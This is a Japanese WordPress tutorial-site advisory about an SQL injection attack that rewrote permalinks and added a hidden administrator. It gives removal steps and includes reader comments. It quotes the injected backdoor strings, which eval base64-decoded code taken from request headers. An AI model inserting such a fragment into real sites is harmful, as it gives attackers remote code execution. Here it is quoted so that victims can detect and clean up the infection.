WPBeginner - 初心者向けWordPressチュートリアル

最も必要とされている時に、信頼できるWordPressチュートリアルを。
WordPress入門ガイド
WPBカップ
2500万人以上
当社のプラグインを使用しているウェブサイト
16歳以上
WordPress経験年数
3000+
専門家によるWordPressチュートリアル

WordPress SQLインジェクション – 最新の攻撃

編集スタッフ | | 読者開示

Shares 2 ChatGPT Perplexity X LinkedIn WhatsApp

最近のSQL攻撃により、多くのサイトが被害を受けており、コードがサイトに注入されています。このMySQLインジェクションは、パーマリンクを無効にすることで影響を与えます。その結果、ブログ投稿のURLが機能しなくなります。この攻撃では多数のWordPressブログが標的となりました。Andy Soward氏がこの件を私たちに知らせてくれたことに感謝します。

この攻撃により、パーマリンク構造に追加されたコードのいずれかが存在していました:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

これらの引用符はサイト上のすべてのパーマリンクに追加され、手動で削除しない限り変更できません。

これを修正するには、以下に移動してください。

設定 > パーマリンク で上記のコードを削除し、デフォルトのコードを置き換えてください。

次にやるべきことは、ユーザーに移動することです。複数の管理者がいることがわかります。名前は表示されませんが、カウントが増加していることがわかります。したがって、やるべきことは、すべてのユーザーを見て、最後に登録したユーザーを見つけることです。そのユーザーの上にマウスを置いてリンクを取得します。コードのuserid=を、その数字に1を追加して変更します。たとえば、表示できる最後のユーザーがユーザー番号2だった場合、それに1を追加して3にします。隠された管理者は、最初の名前として奇妙なコードを持っているはずです。そのコードを削除し、購読者に設定します。その後戻って削除します。

これで問題が解決するはずです。PHPMyAdminにアクセスして、ユーザーを削除することもできます。そこにユーザーが表示されるからです。

できるだけ早くこのニュースを広めたいので、ユーザーは最新情報を得ることができます。ブログが感染していないことを確認してください。WordPressがすぐにリリースされることを願っています。

また、WordPress管理画面を保護するためにこれらの対策のいくつかを実装していない場合。

WPBeginnerで今すぐ人気!

開示:当社のコンテンツは読者によってサポートされています。これは、当社のリンクの一部をクリックすると、当社が手数料を得る可能性があることを意味します。WPBeginnerがどのように資金提供されているか、それがなぜ重要か、そしてどのように私たちをサポートできるかについては、こちらをご覧ください。当社の編集プロセスはこちらです。

究極のWordPressツールキット

無料のツールキットにアクセスしましょう - すべてのプロフェッショナルが持つべきWordPress関連の製品とリソースのコレクションです!

今すぐダウンロード

読者とのインタラクション

8 CommentsLeave a Reply

  1. 私のウェブサイトのデータベースは数日前にインジェクションされ、各投稿またはページのURLの後に奇妙な文字や単語が追加されました。設定:パーマリンクやユーザーメニューに何も奇妙なものが見つかりませんでした。この問題を解決するにはどうすればよいですか?私のホスティング会社は、感染したデータベースのバックアップも持っています!

    Reply

  2. これに2回やられました。

    初めての時はwasupプラグインのSQLインジェクションでしたが、今回はよくわかりません。ホスティングプロバイダーにブロックされました。

    アカウントが復旧したらWordPressを削除します。もううんざりです!

    Reply

    • これで何がわかりましたか?私も同じ問題に遭遇しました。私のアカウント上のすべてのWPサイトが同じ問題を抱えています。

      Reply

    • このコメントは大変感謝しております。問題はWP Super Cacheではなく、WP External Linkというプラグインが原因だと考えています。WP-Super Cacheを2回アンインストールして再インストールしましたが、その後、すべてが正常に機能していた開発サーバーと比較しました。違いはこのプラグインでした。そのプラグインを削除すると機能しました。これでその投稿を読むことができます。

      Reply

      管理者

      • Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        ああ、読んでいます!
        どうもありがとうございます!

        Reply

返信する

コメントを残していただきありがとうございます。すべてのコメントは、当社のコメントポリシーに従ってモデレーションされますので、ご了承ください。メールアドレスは公開されません。名前フィールドにキーワードを使用しないでください。個人的で有意義な会話をしましょう。

Copyright © 2009 - 2025 WPBeginner LLC. All Rights Reserved. WPBeginner® は登録商標です。

Awesome Motive が管理 | SiteGround による WordPressホスティング

WordPress® の商標は WordPress Foundation の知的財産です。このウェブサイトでの WordPress® およびその名称の使用は、識別目的のみであり、WordPress Foundation による承認を意味するものではありません。WPBeginner は WordPress Foundation によって承認、所有、または提携されていません。

私は…について助けが必要です

人気の検索:

ブログの始め方 WordPress SEO WordPressのパフォーマンス WordPressのエラー WordPressセキュリティ オンラインストアの構築